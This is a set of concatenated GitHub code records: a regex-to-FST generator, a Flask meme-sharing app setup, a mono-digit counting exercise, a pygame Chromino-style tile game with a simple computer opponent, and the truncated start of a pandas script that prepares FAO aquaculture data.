@brief generate FST\n # finite repeat must be expanded into union\n #\n # @param generate_out_tokens\n #\n # @param generate_balancedids\n def generate_fst ( self, generate_out_tokens = True ):\n\n if self.root:\n self.node_attribute_id_next = 0\n return self.visit_and_generate_fst( self.root, generate_out_tokens )\n\n else:\n return None\n\n\n # @brief recursive subroutine to generate_fst()\n def visit_and_generate_fst( self, n, generate_out_tokens ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n g_main = None\n\n if n.ast_node_type == 'union': \n graphs = []\n for c in children:\n graphs.append( self.visit_and_generate_fst( c, generate_out_tokens ) )\n g_main = fa.ttsp_bundle( graphs )\n\n elif n.ast_node_type == 'sequence':\n graphs = []\n for c in children:\n graphs.append( self.visit_and_generate_fst( c, generate_out_tokens ) )\n g_main = fa.ttsp_concatenate( graphs )\n\n elif n.ast_node_type == 'terminal':\n in_token, out_token = n.node_content_for_fst_main( self.node_attribute_id_next )\n self.node_attribute_id_next += 1\n\n g_main = fa.make_unit_transition( in_token, out_token )\n\n elif n.ast_node_type == 'nonterminal':\n in_token, out_token = n.node_content_for_fst_main( self.node_attribute_id_next )\n self.node_attribute_id_next += 1\n\n g_main = fa.make_unit_transition( in_token, out_token )\n\n elif n.ast_node_type == 'epsilon':\n g_main = fa.make_unit_epsilon()\n\n elif n.ast_node_type == 'infinite repeat' or n.ast_node_type == 'finite repeat':\n\n if n.repeat_min == 0:\n if n.repeat_max == 1:\n graphs = []\n graphs.append( self.visit_and_generate_fst( children[0], generate_out_tokens ) )\n graphs.append( fa.make_unit_epsilon() )\n g_main = fa.ttsp_bundle( graphs )\n else:\n graphs = []\n graphs.append( self.visit_and_generate_fst( children[0], generate_out_tokens ) )\n graphs.append( fa.make_unit_epsilon() )\n g_inside = fa.ttsp_bundle( graphs )\n g_main = fa.enclose_in_cycle( g_inside, n.repeat_max )\n else:\n g_inside = self.visit_and_generate_fst( children[0], generate_out_tokens )\n g_main = fa.enclose_in_cycle( g_inside, n.repeat_max )\n\n else:\n return None\n\n\n if generate_out_tokens:\n\n # pair-up the attributes by using the same attribute ID.\n out_token_pre = n.extra_epsilon_nodes_before ( )\n out_token_post = n.extra_epsilon_nodes_after ( )\n\n if out_token_pre != '' or out_token_post != '':\n\n marker_pre = '[PRE {:d}]'.format(self.node_attribute_id_next)\n marker_post = '[POST {:d}]'.format(self.node_attribute_id_next)\n self.node_attribute_id_next += 1\n\n serial_graphs = []\n serial_graphs.append( fa.make_unit_transition( marker_pre, out_token_pre ) )\n serial_graphs.append( g_main )\n serial_graphs.append( fa.make_unit_transition( marker_post, out_token_post ) )\n return fa.ttsp_concatenate( serial_graphs )\n\n else:\n return g_main\n\n else:\n return g_main\n\n\n ########################################\n # #\n # count_phrases() #\n # #\n ########################################\n\n\n # @public\n # @brief count the number of phrases the node accepts\n # as a root of the subtree.\n # under the repeat nodes are not explored\n def count_phrases(self):\n if self.root:\n self.visit_and_count_phrases( self.root )\n\n\n # @brief recursive subroutine of count_phrases()\n def visit_and_count_phrases( self, n ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n self.visit_and_count_phrases( c )\n\n if n.ast_node_type == 'union':\n n.phrase_count = 0\n for c in children:\n n.phrase_count += c.phrase_count\n \n elif n.ast_node_type == 'sequence':\n\n n.phrase_count = 1\n for c in children:\n n.phrase_count *= c.phrase_count\n\n else:\n n.phrase_count = 1\n","repo_name":"ShoYamanishi/nlpregex","sub_path":"regular_language/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":64076,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71932900968","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nimport dotenv, os, logging\nfrom logging.handlers import RotatingFileHandler\n\n# set the project root directory as an environment variable to be used in other modules\nos.environ[\"PROJECT_ROOT\"] = os.path.abspath(\n os.path.join(os.path.abspath(os.path.dirname(__file__)), os.pardir)\n)\nos.environ[\"ENV_PATH\"] = os.path.join(os.environ.get(\"PROJECT_ROOT\"), \".env\")\ncheck_for_dotenv = os.path.exists(os.environ.get(\"ENV_PATH\"))\n\nif check_for_dotenv:\n # if the .env file exists, load it into the environment\n dotenv.load_dotenv(dotenv_path=os.environ.get(\"ENV_PATH\"))\n print(\"loaded environment variables from .env file\")\n os.environ[\"ENV_MODE\"] = \"dev\"\nelse:\n print(\"Loading environment variables from system.\")\ntry:\n assert os.environ.get(\"SQLALCHEMY_DATABASE_URI\") is not None\n assert os.environ.get(\"SECRET_KEY\") is not None\n assert os.environ.get(\"ADMIN_PASSWORD\") is not None\nexcept AssertionError as e:\n print(\"One or more missing environment variables.\")\n raise e\n\n# initialize the app configuration with the utils module and Config class\nclass Config:\n \"\"\"\n @field SQLALCHEMY_DATABASE_URI: The URI for the database.\n @field UPLOADS_FOLDER: The folder where uploaded files are stored.\n @field THUMBNAILS_FOLDER: The folder where thumbnails are stored.\n @field SECRET_KEY: The secret key for the app.\n @field SQLALCHEMY_TRACK_MODIFICATIONS: Whether to track modifications to the database.\n @field SQLALCHEMY_ECHO: Whether to echo SQL statements to the console.\n @field ADMIN_PASSWORD: The password for the admin user.\n \"\"\"\n\n SQLALCHEMY_DATABASE_URI = os.environ.get(\"SQLALCHEMY_DATABASE_URI\")\n UPLOADS_FOLDER = os.environ.get(\"PROJECT_ROOT\") + \"/app/static/uploads\"\n THUMBNAILS_FOLDER = (\n os.environ.get(\"PROJECT_ROOT\") + \"/app/static/uploads/thumbnails\"\n )\n SECRET_KEY = os.environ.get(\"SECRET_KEY\")\n SQLALCHEMY_TRACK_MODIFICATIONS = (\n os.environ.get(\"SQLALCHEMY_TRACK_MODIFICATIONS\") or False\n )\n SQLALCHEMY_ECHO = os.environ.get(\"SQLALCHEMY_ECHO\") or False\n ADMIN_PASSWORD = os.environ.get(\"ADMIN_PASSWORD\")\n\n\n# create the folder structure for the uploads and thumbnails, if they do not exist\nos.makedirs(Config.THUMBNAILS_FOLDER, exist_ok=True)\n\n# create an instance of the Config class\nconf = Config()\n\n# initialize the database\ndb: SQLAlchemy = SQLAlchemy()\n\n# initialize the login manager\nlogin_manager = LoginManager()\n\n# set the login view for the login manager\nlogin_manager.login_view = \"routes.login\"\n\n\n# create the app factory function and register the blueprints and database\ndef create_app():\n \"\"\"\n Create the app instance and register the blueprints and database.\n @return: The app instance.\n \"\"\"\n # create the flask app instance\n app = Flask(__name__)\n\n # load the app configuration\n app.config.from_object(Config)\n\n log_level = logging.INFO\n\n # Define the log file path\n log_file_path = f\"{os.environ['PROJECT_ROOT']}/app.log\"\n\n # Create a log formatter\n log_formatter = logging.Formatter(\n \"[%(asctime)s] [%(levelname)s] %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n )\n\n # Create a rotating file handler to log messages to the file\n file_handler = RotatingFileHandler(log_file_path, maxBytes=1000000, backupCount=5)\n file_handler.setFormatter(log_formatter)\n\n # Get the app's logger and add the file handler to it\n app.logger.addHandler(file_handler)\n\n # Set the log level for the app's logger\n app.logger.setLevel(log_level)\n\n # initialize the database\n db.init_app(app)\n\n # initialize the login manager\n login_manager.init_app(app)\n\n # using the app context, register the blueprints and models\n with app.app_context():\n\n # import the routes and models modules\n from . import routes\n from . import models\n\n # register the blueprints\n app.register_blueprint(routes.endpoint)\n\n # create the database tables if they do not exist\n db.create_all()\n\n # from .scripts import test_memes\n # test_memes.generate_test_memes()\n # return the app instance\n return app\n\n\n# create the app instance\napp = create_app()\n","repo_name":"Willmo103/Meme-Share","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34974700709","text":"inp = input(\"Enter a sequence of positive integers, each one on a separate line. \\n \"\n \"End your sequence by typing -1: \")\n\ncount = 0\n\n\nwhile int(inp) != -1:\n check = True\n for each in range(1, len(inp), 1):\n if inp[0] != inp[each]:\n check = False\n if check:\n count += 1\n inp = input()\n\nprint(\"You entered \" + str(count) + \" mono-digit numbers\")\n","repo_name":"otisscott/1114-Stuff","sub_path":"Lab 6/monodigit.py","file_name":"monodigit.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26400992830","text":"# Import the pygame module\nimport time\n\nimport pygame\nimport random\nimport datetime\n\n# Import pygame.locals for easier access to key coordinates\n# Updated to conform to flake8 and black standards\n\nfrom pygame.locals import (\n QUIT,\n MOUSEBUTTONDOWN,\n MOUSEBUTTONUP,\n MOUSEMOTION,\n)\n\nimport blocks\nimport playground\n\ndef timing(func):\n def inner(*args,**kwargs):\n print('******************* '+func.__name__+' *******************' )\n ct = datetime.datetime.now()\n print(\"current time:-\", ct)\n result = func(*args,**kwargs)\n ct = datetime.datetime.now()\n print(\"current time:-\", ct)\n return result\n return inner\n\ndef moveAllSpriteBoard(direction,board):\n global xRectifCoef\n global yRectifCoef\n\n if direction == 'U':\n yRectifCoef = yRectifCoef + 1\n\n if direction == 'D':\n yRectifCoef = yRectifCoef - 1\n\n if direction == 'L':\n xRectifCoef = xRectifCoef + 1\n\n if direction == 'R':\n xRectifCoef = xRectifCoef - 1\n\n for block in board:\n if direction == 'U':\n block.setPosXRectif(block.x)\n block.setPosYRectif(block.y - block.SQUAREBORDERSIZECONST)\n #block.redraw()\n\n if direction == 'D':\n block.setPosXRectif(block.x)\n block.setPosYRectif(block.y + block.SQUAREBORDERSIZECONST)\n #block.redraw()\n\n if direction == 'L':\n block.setPosYRectif(block.y)\n block.setPosXRectif(block.x - block.SQUAREBORDERSIZECONST)\n #block.redraw()\n\n if direction == 'R':\n block.setPosYRectif(block.y)\n block.setPosXRectif(block.x + block.SQUAREBORDERSIZECONST)\n\n if block.orientation == 'H':\n if (block.x + (3 * theBoard.rectsize) < theBoard.boardTable.size[0] and block.y < theBoard.boardTable.size[1]\\\n and (block.y > 127)):\n block.hide = False\n else:\n block.hide = True\n\n if block.orientation == 'V':\n if block.x < theBoard.boardTable.size[0] and block.y + (3 * theBoard.rectsize) < theBoard.boardTable.size[1]\\\n and (block.y > 127):\n block.hide = False\n else:\n block.hide = True\n\n block.redraw()\n\n\ndef addToMatrix(matrix,block):\n global minX\n global maxX\n global minY\n global maxY\n\n x = int(block.x/theBoard.rectsize + MATRIXCOEF + xRectifCoef)\n y = int(block.y/theBoard.rectsize + MATRIXCOEF + yRectifCoef)\n xOrig = x\n yOrig = y\n\n matrix[x][y]=block.col1\n\n if block.orientation == 'H':\n if x < minX or minX == 0:\n minX = xOrig\n\n if x + 2 > maxX or minX == 0:\n maxX = x + 2\n\n if y < minY or minY == 0:\n minY = yOrig\n elif y > maxY or minX == 0:\n maxY = yOrig\n\n x = x + 1\n matrix[x][y] = block.col2\n x = x + 1\n matrix[x][y] = block.col3\n\n else:\n\n if x < minX or minX == 0:\n minX = x\n elif x > maxX or minX == 0:\n maxX = x\n\n if y < minY or minY == 0:\n minY = y\n\n if y+2 > maxY or minY == 0:\n maxY = y + 2\n\n y = y + 1\n matrix[x][y] = block.col2\n y = y + 1\n matrix[x][y] = block.col3\n\n if maxY ==0:\n maxY = minY\n\ndef transScreenPosMatPosX(x):\n x = int((x / theBoard.rectsize) + MATRIXCOEF)\n return x + xRectifCoef\n\ndef transScreenPosMatPosY(y):\n y = int((y / theBoard.rectsize) + MATRIXCOEF)\n return y + yRectifCoef\n\ndef checkBlockArround(matrix,color,x,y):\n val = 0\n # curent pos\n x = int(x)\n y = int(y)\n if matrix[x][y] != 0:\n return -1\n\n # left\n #if matrix[x-1][ y] != 0:\n # return -1\n\n if matrix[x-1][ y] == color:\n val = val + 1\n\n if matrix[x-1][y] != color and matrix[x-1][ y] != 0:\n return - 1\n\n # up\n #if matrix[x ][ y-1] != 0:\n # return -1\n\n if matrix[x ][ y-1] == color:\n val = val + 1\n\n if matrix[x][ y-1] != color and matrix[x][ y-1] != 0:\n return - 1\n\n\n # right\n #if matrix[x + 1][ y] != 0:\n # return -1\n\n if matrix[x+1][ y] == color:\n val = val + 1\n\n if matrix[x+1][ y] != color and matrix[x+1][ y] != 0:\n return - 1\n\n # down\n #if matrix[x ][ y + 1] != 0:\n # return -1\n\n if matrix[x][ y+1] == color:\n val = val + 1\n\n if matrix[x][ y+1] != color and matrix[x][ y+1] != 0:\n return - 1\n\n return val\n\ndef validationBlockV(matrix,block,x,y):\n val = 0\n rep = checkBlockArround(matrix, block.col1,int(x),int(y))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n rep = checkBlockArround(matrix, block.col2, int(x ), int(y+1))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n rep = checkBlockArround(matrix, block.col3, int(x ), int(y+2))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n return val > 1\n\ndef validationBlockH(matrix, block, x, y):\n val = 0\n\n rep = checkBlockArround(matrix, block.col1, int(x), int(y))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n rep = checkBlockArround(matrix, block.col2, int(x+1) , int(y))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n rep = checkBlockArround(matrix, block.col3, int(x+2) , int(y))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n return val > 1\n\ndef validationBlock(matrix,block,x,y):\n if block.orientation == 'H':\n return validationBlockH(matrix, block, x, y)\n\n if block.orientation == 'V':\n return validationBlockV(matrix, block, x, y)\n\n\ndef computerIA(matrix, computer, minX, maxX, minY, maxY, handicap = 100):\n\n\n blockOk = False\n find = False\n for block in computer:\n i = 0\n while i <= 3 and not find:\n x = minX - 3\n while x <= maxX + 2 and not find:\n x = x + 1\n y = minY - 3\n\n while y <= maxY + 2 and not find:\n y = y + 1\n if (block.orientation == 'H' and matrix[x][y] == 0 and matrix[x+1][y] == 0 and matrix[x+2][y] == 0 ) or \\\n (block.orientation == 'V' and matrix[x][y] == 0 and matrix[x][y+1] == 0 and matrix[x][y+2] == 0 ):\n blockOk = validationBlock(matrix,block,x,y)\n if blockOk :\n if int(random.randint(0, 100)) <= handicap:\n find = True\n\n if not find:\n block.rotate()\n i = i + 1\n\n if find:\n break\n\n if blockOk:\n theBoard.scoreBoard(len(computer), 15, 33, 'Adversaire',screen)\n theBoard.scoreBoard(len(player), 215, 33, 'Moi',screen)\n pygame.display.flip()\n\n rect = pygame.Rect(SCREEN_WIDTH / 2 - 200, SCREEN_HEIGHT / 2 - 300, 50, 50)\n\n icon = pygame.image.load('./assets/reflechir.png')\n icon = pygame.transform.scale(icon, (50, 50))\n\n # surface.blit(self.icon, self.rect)\n #screen.blit(icon, rect)\n #pygame.display.flip()\n\n pygame.mixer.Sound.play(soundClock)\n pygame.mixer.music.stop()\n\n time.sleep(2)\n\n calculX = ((x - MATRIXCOEF) * theBoard.rectsize) - (xRectifCoef * theBoard.rectsize)\n calculY = ((y - MATRIXCOEF) * theBoard.rectsize) - (yRectifCoef * theBoard.rectsize)\n\n block.setPosX(calculX)\n block.setPosY(calculY)\n block.lastIaPlayed = True\n block.lastPlayedTime = time.time()\n block.lastRefreshScreen = time.time()\n addToMatrix(gameMatrix, block)\n computer.remove(block)\n board.append(block)\n block.redraw()\n blocksGroup.add(block)\n\n else:\n theBoard.scoreBoard(len(computer), 15, 33, 'Adversaire',screen)\n theBoard.scoreBoard(len(player), 215, 33, 'Moi',screen)\n pygame.display.flip()\n\n blocksInBag = bag.getNumberBlock()\n randomBlockId = random.randint(0, blocksInBag - 1)\n computer.append(bag.getBlock(randomBlockId))\n bag.removeBlock(bag.getBlock(randomBlockId))\n rect = pygame.Rect(SCREEN_WIDTH / 2 - 200, SCREEN_HEIGHT / 2 - 300, 50, 50)\n\n pygame.mixer.Sound.play(soundTake)\n pygame.mixer.music.stop()\n\n icon = pygame.image.load('./assets/IA_takes.png')\n icon = pygame.transform.scale(icon, (400, 400))\n\n\n # surface.blit(self.icon, self.rect)\n screen.blit(icon, rect)\n pygame.display.flip()\n time.sleep(3)\n\ndef findFreeSpace(x = None, y = None):\n if x is None:\n x = theBoard.playerTable.x\n if y is None:\n y = theBoard.playerTable.y\n\n for blockPlayer in player:\n if blockPlayer.x == x and blockPlayer.y == y:\n x = (x + blockPlayer.SQUAREBORDERSIZE * 3) + 5\n if x > theBoard.playerTable.width:\n x = 0\n y = y + blockPlayer.SQUAREBORDERSIZE + 5\n return findFreeSpace(x, y)\n break\n\n if y > screen.get_height():\n x = theBoard.playerTable.x\n y = theBoard.playerTable.y\n break\n\n return findFreeSpace(x,y)\n break\n\n return (x,y)\n\ndef score(Score = 0 ):\n\n tenPart = int(Score/10)\n unitPart = Score % 10\n\n fileTen = './assets/'+str(tenPart)+'.png'\n fileUnit = './assets/'+str(unitPart)+'.png'\n numberL = pygame.image.load(fileTen)\n numberR = pygame.image.load(fileUnit)\n\n numberL = pygame.transform.scale(numberL, (40, 40))\n numberR = pygame.transform.scale(numberR, (40, 40))\n\n return(numberL,numberR)\n\nif __name__ == \"__main__\":\n #sound\n pygame.mixer.init()\n soundPlayerOk = pygame.mixer.Sound(\"./assets/playerOk.wav\")\n soundPlayerNok = pygame.mixer.Sound(\"./assets/fail.wav\")\n soundClock = pygame.mixer.Sound(\"./assets/clock.wav\")\n soundBack = pygame.mixer.Sound(\"./assets/background.mp3\")\n soundGameOver = pygame.mixer.Sound(\"./assets/gameover.mp3\")\n soundWin = pygame.mixer.Sound(\"./assets/win.mp3\")\n soundTake = pygame.mixer.Sound(\"./assets/takeinbag.mp3\")\n\n pygame.mixer.Sound.play(soundBack,-1)\n\n\n # Define constants for the screen width and height\n xRectifCoef = 0\n yRectifCoef = 0\n\n MATRIXCOEF = 100\n #SCREEN_WIDTH = 1440\n #SCREEN_HEIGHT = 900\n FPS = 30\n NBRBLOCKBYPLAYER = 9\n BACKGROUNDCOLOR = (0,0,0)\n\n\n # Initialize pygame\n pygame.init()\n\n\n # Create the screen object\n # The size is determined by the constant SCREEN_WIDTH and SCREEN_HEIGHT\n #screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n screen = pygame.display.set_mode()\n pygame.display.set_caption('CHROMINO')\n SCREEN_WIDTH = screen.get_width()\n SCREEN_HEIGHT = screen.get_height()\n #create playGround\n theBoard = playground.PlayGround(SCREEN_WIDTH,SCREEN_HEIGHT)\n\n # Instantiate a bag of blocks\n bag = blocks.Bag(theBoard.surf)\n\n #get randomly the first block to start the game\n #always à 3 colors blocks\n #always in the first 10 position in the bag\n startBlockId = random.randint(0, 4)\n blockZero = bag.getBlock(startBlockId)\n bag.removeBlock(blockZero)\n\n #put the first block in the middle of the board\n blockZero.block.x = blockZero.rectifPos(theBoard.boardTable.centerx)\n blockZero.block.y = blockZero.rectifPos(theBoard.boardTable.centery)\n blockZero.setPosX(blockZero.block.x)\n blockZero.setPosY(blockZero.block.y)\n blockZero.canBeMoved = False\n\n #create MBR\n #minX = blockZero.x\n #maxX = blockZero.x + 3\n #minY = blockZero.y\n #maxY = blockZero.y + 3\n\n minX = 0\n maxX = 0\n minY = 0\n maxY = 0\n\n #create the board\n board = []\n board.append(blockZero)\n\n #create the blocks for the player\n player = []\n for i in range(NBRBLOCKBYPLAYER):\n blocksInBag = bag.getNumberBlock()\n randomBlockId = random.randint(0, blocksInBag-1)\n player.append(bag.getBlock(randomBlockId))\n bag.removeBlock(bag.getBlock(randomBlockId))\n\n #create the blocks for the computer\n computer = []\n for i in range(NBRBLOCKBYPLAYER):\n blocksInBag = bag.getNumberBlock()\n randomBlockId = random.randint(0, blocksInBag-1)\n computer.append (bag.getBlock(randomBlockId))\n bag.removeBlock(bag.getBlock(randomBlockId))\n\n gameMatrix = [[0 for _ in range(1000)] for _ in range(1000)]\n\n addToMatrix(gameMatrix,blockZero)\n\n #create sprite group\n blocksGroup = pygame.sprite.Group()\n\n #blit the sceen\n screen.blit(theBoard.surf,theBoard.playGround)\n\n blocksGroup.add(blockZero)\n posXPlayer = 0\n posYPlayer = SCREEN_HEIGHT - 180\n for playerBlock in player:\n\n playerBlock.setPosX(posXPlayer)\n playerBlock.setPosY(posYPlayer)\n playerBlock.block.x = posXPlayer\n playerBlock.block.y = posYPlayer\n\n playerBlock.canBeMoved = True\n blocksGroup.add(playerBlock)\n posXPlayer += 100\n\n #to debug IA\n\n \"\"\"\n posXComputer = SCREEN_WIDTH - 180\n posYComputer = 0\n for playerComputer in computer:\n playerComputer.setPosX(posXComputer)\n playerComputer.setPosY(posYComputer)\n playerComputer.block.x = posXComputer\n playerComputer.block.y = posYComputer\n\n playerComputer.canBeMoved = False\n blocksGroup.add(playerComputer)\n posYComputer += 30\n \"\"\"\n ##########\n\n # Variable to keep the main loop running\n running = True\n\n clock = pygame.time.Clock()\n captured = False\n arrowCaptured = False\n addBlock = False\n turn = 'PLAYER'\n\n #playground.Button.draw(theBoard.surf)\n\n\n while running and computer and player and bag :\n\n if turn == 'COMPUTER':\n theBoard.scoreBoard(len(computer), 15, 33, 'Adversaire',screen)\n theBoard.scoreBoard(len(player), 215, 33, 'Moi',screen)\n pygame.display.flip()\n\n computerIA(gameMatrix, computer, minX, maxX, minY, maxY,75)\n turn = 'PLAYER'\n\n screen.fill(BACKGROUNDCOLOR)\n screen.blit(theBoard.surf, theBoard.playGround)\n mousePos = pygame.mouse.get_pos()\n\n for event in pygame.event.get():\n for playerBlock in player:\n if event.type == MOUSEBUTTONDOWN and playerBlock.block.collidepoint(mousePos) and not captured:\n playerBlock.setFocus(True)\n captured = True\n pygame.mouse.set_pos(playerBlock.getPos())\n elif event.type == MOUSEBUTTONDOWN and playerBlock.focus and captured:\n captured = False\n playerBlock.setFocus(False)\n #rectif the x and y position only on the board\n if theBoard.boardTable.collidepoint(mousePos):\n\n xRectif = playerBlock.rectifPos(mousePos[0])\n yRectif = playerBlock.rectifPos(mousePos[1])\n\n canBeValidate = True\n # can not overlap a block on the board\n for blockBoard in board:\n if playerBlock.block.colliderect(blockBoard.block):\n canBeValidate = False\n\n if canBeValidate:\n #validation\n\n if validationBlock(gameMatrix,playerBlock,transScreenPosMatPosX(xRectif),transScreenPosMatPosY(yRectif)):\n playerBlock.setPosXRectif(xRectif)\n playerBlock.setPosYRectif(yRectif)\n board.append(playerBlock)\n addToMatrix(gameMatrix, playerBlock)\n player.remove(playerBlock)\n turn = 'COMPUTER'\n #play sound\n\n pygame.mixer.Sound.play(soundPlayerOk)\n pygame.mixer.music.stop()\n\n else:\n playerBlock.setPosX(mousePos[0])\n playerBlock.setPosY(mousePos[1])\n\n playerBlock.block.x = playerBlock.getPosX()\n playerBlock.block.y = playerBlock.getPosY()\n\n elif event.type == pygame.KEYDOWN and playerBlock.focus:\n # Check if the key pressed is 'r'\n if event.key == pygame.K_r:\n playerBlock.rotate()\n playerBlock.setFocus(True)\n captured = True\n\n elif event.type == MOUSEMOTION and playerBlock.focus:\n playerBlock.motionByMouse(event.rel)\n\n elif event.type == MOUSEBUTTONDOWN and \\\n not captured and not arrowCaptured and theBoard.buttonUp.collidepoint(mousePos):\n arrowCaptured = True\n\n elif event.type == MOUSEBUTTONUP and \\\n not captured and \\\n theBoard.buttonUp.collidepoint(mousePos) and \\\n arrowCaptured:\n arrowCaptured = False\n moveAllSpriteBoard('U', board)\n\n elif event.type == MOUSEBUTTONDOWN and \\\n not captured and not arrowCaptured and theBoard.buttonDown.collidepoint(mousePos):\n arrowCaptured = True\n\n elif event.type == MOUSEBUTTONUP and \\\n not captured and \\\n theBoard.buttonDown.collidepoint(mousePos) and \\\n arrowCaptured:\n arrowCaptured = False\n moveAllSpriteBoard('D', board)\n\n elif event.type == MOUSEBUTTONDOWN and \\\n not captured and not arrowCaptured and theBoard.buttonLeft.collidepoint(mousePos):\n arrowCaptured = True\n\n elif event.type == MOUSEBUTTONUP and \\\n not captured and \\\n theBoard.buttonLeft.collidepoint(mousePos) and \\\n arrowCaptured:\n arrowCaptured = False\n moveAllSpriteBoard('L', board)\n\n elif event.type == MOUSEBUTTONDOWN and \\\n not captured and not arrowCaptured and theBoard.buttonRight.collidepoint(mousePos):\n arrowCaptured = True\n\n elif event.type == MOUSEBUTTONUP and \\\n not captured and \\\n theBoard.buttonRight.collidepoint(mousePos) and \\\n arrowCaptured:\n arrowCaptured = False\n moveAllSpriteBoard('R', board)\n\n elif event.type == MOUSEBUTTONDOWN and not captured and \\\n theBoard.buttonAdd.collidepoint(mousePos) and \\\n not arrowCaptured and not addBlock:\n addBlock = True\n\n blocksInBag = bag.getNumberBlock()\n randomBlockId = random.randint(0, blocksInBag - 1)\n tempoBlock = bag.getBlock(randomBlockId)\n posInPlayerTable = findFreeSpace()\n tempoBlock.setPosX(posInPlayerTable[0])\n tempoBlock.setPosY(posInPlayerTable[1])\n player.append(tempoBlock)\n blocksGroup.add(tempoBlock)\n bag.removeBlock(tempoBlock)\n pygame.mixer.Sound.play(soundTake)\n pygame.mixer.music.stop()\n turn = 'COMPUTER'\n tempoBlock.redraw()\n pygame.mixer.Sound.play(soundPlayerNok)\n pygame.mixer.music.stop()\n\n elif event.type == MOUSEBUTTONUP and not captured and \\\n theBoard.buttonAdd.collidepoint(mousePos) and \\\n not arrowCaptured and addBlock:\n addBlock = False\n\n elif event.type == QUIT:\n running = False\n\n\n #END FOR PLAYER\n #END FOR EVENT\n\n for block in board:\n if block.lastIaPlayed:\n if time.time() - block.lastRefreshScreen > 0.3:\n block.lastRefreshScreen = time.time()\n block.hide = not block.hide\n block.redraw()\n if time.time() - block.lastPlayedTime > 5:\n block.lastPlayedTime = False\n block.hide = False\n block.redraw()\n\n # Draw the player on the screen\n for entity in blocksGroup:\n screen.blit(entity.surf, entity.block)\n\n #END FOR\n\n\n theBoard.scoreBoard(len(computer),15,33,'Adversaire',screen)\n theBoard.scoreBoard(len(player),215,33,'Moi',screen)\n\n\n\n # Update the display\n pygame.display.flip()\n\n clock.tick(FPS)\n\n # END WHILE\n\n if not computer:\n rect = pygame.Rect(SCREEN_WIDTH / 2 - 200, SCREEN_HEIGHT / 2 - 300, 50, 50)\n\n endGame = pygame.image.load('./assets/you_lose.png')\n endGame = pygame.transform.scale(endGame, (400, 200))\n\n # surface.blit(self.icon, self.rect)\n screen.blit(endGame, rect)\n pygame.display.flip()\n # pygame.display.flip()\n\n pygame.mixer.Sound.play(soundGameOver)\n pygame.mixer.music.stop()\n\n time.sleep(4)\n\n\n\n if not player:\n\n rect = pygame.Rect(SCREEN_WIDTH / 2 - 200, SCREEN_HEIGHT / 2 - 300, 50, 50)\n\n endGame = pygame.image.load('./assets/you_win.png')\n endGame = pygame.transform.scale(endGame, (400, 200))\n\n # surface.blit(self.icon, self.rect)\n screen.blit(endGame, rect)\n pygame.display.flip()\n # pygame.display.flip()\n\n pygame.mixer.Sound.play(soundWin)\n pygame.mixer.music.stop()\n time.sleep(4)\n\n if not bag:\n rect = pygame.Rect(SCREEN_WIDTH / 2 - 200, SCREEN_HEIGHT / 2 - 300, 50, 50)\n\n endGame = pygame.image.load('./assets/game_over.png')\n endGame = pygame.transform.scale(endGame, (400, 200))\n\n # surface.blit(self.icon, self.rect)\n screen.blit(endGame, rect)\n pygame.display.flip()\n # pygame.display.flip()\n time.sleep(4)\n\n #END __MAIN__\n","repo_name":"EXM699/kromino","sub_path":"kromino.py","file_name":"kromino.py","file_ext":"py","file_size_in_byte":22431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9780591149","text":"import pandas as pd\nimport os\n\nimport functions_file_preparation as ffprep\nimport variables\n\n# create and move to directory for raw files that will be merged. \nos.chdir(os.path.dirname(__file__))\nos.chdir('../data/')\n\n# download data\nurl = 'https://www.fao.org/fishery/static/Data/Aquaculture_2022.1.1.zip'\nffprep.write_from_url(url, 'Aquaculture_2022.1.1.zip')\n\n# extract and cleanup\nffprep.unzip_and_cleanup('Aquaculture_2022.1.1.zip', 'Aquaculture_Raw')\n\n\n# load in both the quantity (mass) of fish raised with the value in USD\nfish_quantity = pd.read_csv(\"./Aquaculture_Raw/Aquaculture_Quantity.csv\")\n#fish_value = pd.read_csv(\"./Aquaculture_Raw/Aquaculture_Value.csv\")\n\n\n# merge these two \n# fish_quant_value = pd.merge(fish_quantity, fish_value, how = 'outer',\n# on = ['PERIOD', 'COUNTRY.UN_CODE', 'SPECIES.ALPHA_3_CODE', 'AREA.CODE', 'ENVIRONMENT.ALPHA_2_CODE'])\n\n# rename columns\n# fish_quant_value.rename(columns = {'VALUE_x': 'Quantity', 'VALUE_y': 'ValueUSD'}, inplace = True)\nfish_quantity.rename(columns = {'VALUE': 'Quantity'}, inplace = True)\n\n# replace the NaN (which are created due to blank values) with \"OFF\" for OFFICIAL\n# fish_quant_value['STATUS_x'].fillna(\"OFF\", inplace = True)\n# fish_quant_value['STATUS_y'].fillna(\"OFF\", inplace = True)\nfish_quantity['STATUS'].fillna(\"OFF\", inplace = True)\n \n \n# use function to merge codelist files \nfish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_COUNTRY_GROUPS.csv\", \n [\"UN_Code\", \"Name_En\"], \"COUNTRY.UN_CODE\", \"Country\")\n\nfish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_WATERAREA_GROUPS.csv\", \n [\"Code\", \"Name_En\"], \"AREA.CODE\", \"WaterArea\")\n\nfish_quantity = ffprep.merge_codelist_files(fish_quantity, \"./Aquaculture_Raw/CL_FI_PRODENVIRONMENT.csv\", \n [\"Code\", \"Name_En\"], \"ENVIRONMENT.ALPHA_2_CODE\", \"Environment\")\n\nfish_quantity = 